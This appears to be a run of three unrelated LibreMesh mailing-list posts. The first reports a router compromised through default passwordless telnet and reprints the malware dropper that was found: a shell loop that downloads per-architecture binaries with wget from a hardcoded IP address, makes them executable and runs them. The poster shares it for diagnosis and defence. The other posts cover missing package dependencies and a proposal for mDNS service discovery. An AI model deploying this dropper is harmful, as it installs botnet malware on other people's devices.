So, i just flashed a generic Community Chaos taken from
http://downloads.libremesh.org/community_chaos/16.07/ar71xx/generic/
on a device that gets a public ipv4 over WAN
went in via telnet, configured some bits, but i felt it was a bit
unresponsive. checking loadavg with "uptime":
12:00:25 up 17 min, load average: 3.70, 1.36, 0.53
and logread showed some OOM... suspicious
i had been infected already with some malware :(
found a process "LA4obRtMROA7TAt2wWN1TnwHw"
and a file in the root directory: /bin.sh
which i copy at the end of this email for reference.
so funny, for a moment i felt a deja-vu like the many times i connected
a Windows PC directly to a public IP, and in under 5 minutes it had been
infected with viruses.
(this LiMe was infected in under 15 minutes as well)
It most likely came in via telnet, since that's open and passwordless
by default on our releases.
I think we should at least block telnet port over WAN by default
##########################
#!/bin/sh
BIN_NAMES="mips mpsl arm arm7 ppc spc m68k sh4"
HTTP_SERVER="95.215.62.11"
HTTP_PORT=80
DROPPER_FILE_NAME="dvrAssist"
for a in $BIN_NAMES
do
if [ -f "/bin/chmod" ]
then
rm $DROPPER_FILE_NAME
/bin/busybox wget http://$HTTP_SERVER:$HTTP_PORT/bins/$a
-O - > $DROPPER_FILE_NAME
chmod 777 $DROPPER_FILE_NAME
./$DROPPER_FILE_NAME
>$DROPPER_FILE_NAME
else
rm $DROPPER_FILE_NAME
cp /bin/echo $DROPPER_FILE_NAME
>$DROPPER_FILE_NAME
/bin/busybox wget http://$HTTP_SERVER:$HTTP_PORT/bins/$a
-O - > $DROPPER_FILE_NAME
./$DROPPER_FILE_NAME
>$DROPPER_FILE_NAME
fi
done
echo infectfgt
First, I want to say that LibreMesh is awesome! From the short time I've
been looking at it, it looks very professional and well thought out.
I've had two problems getting LIME 16.07 installed :
1. The package 'lime-basic' requires 'lime-eb-ip-tables'
2. 'lime-webui' requires 'luci-i18n-english'
I couldn't find those missing packages anywhere.
The system seems to work when I force opkg to ignore those dependencies,
but I don't know it well enough yet to know if it is fully working.
I compiled from the lime-build source git at :
https://github.com/libremesh/lime-build
I had to use menuconfig to make most everything into a module, since I'm
using a 4MB TPLink MR3020 with an external root on USB. Then I tried to
install 'lime-full'.
I couldn't find the two missing modules by searching in menuconfig.
Apologies if this is already fixed in the dev branch.
-Kevin
Hi All,
My name is Nicolás, I'm from Argentina and I'm working promoting
community networks while I travel in Latin America... Glad to be part
of this community, and thanks to you all for all you have been doing so
far, it is amazing!!!
I wanted to share with you some of my last work (that I've been
discussing with Nico Echaniz, who suggested to migrate it to here),
about how we can promote the use of local services.
My view about this has been on using local discovery techniques to
identify which local services are around using mdns, and then promote
those services via a captive portal.
There are many services that are already shared in this way (like
printers, media repositories, chat apps) and it is quite easy to add
new ones or index those that are not added manually also.
I have also defined a strategy on how to deploy this on LiMe based on
Nico`s experience on multicast packages (those used by the mDNS
discovery mechanism) on mesh networks (quite a mess for now)... so I
found a workaround for this specific case.
We cound add a daemon to LiMe that permanently scans its local network
searching for services, and shares that information via Alfred.
Together with another daemon that listens to Alfred and adds that
information to the LiMe mDNS Service (Avahi)... that sorts out the
multicast issue and lets us share that valuable information efficiently.
For those services that don't support mDNS we could add an interface on
luci to manually administer them.
Finally, we could add a section on the Captive Portal to show this
information.
What do you think?
Regards,
--
Nicolás Pace
http://www.linkedin.com/in/nickar
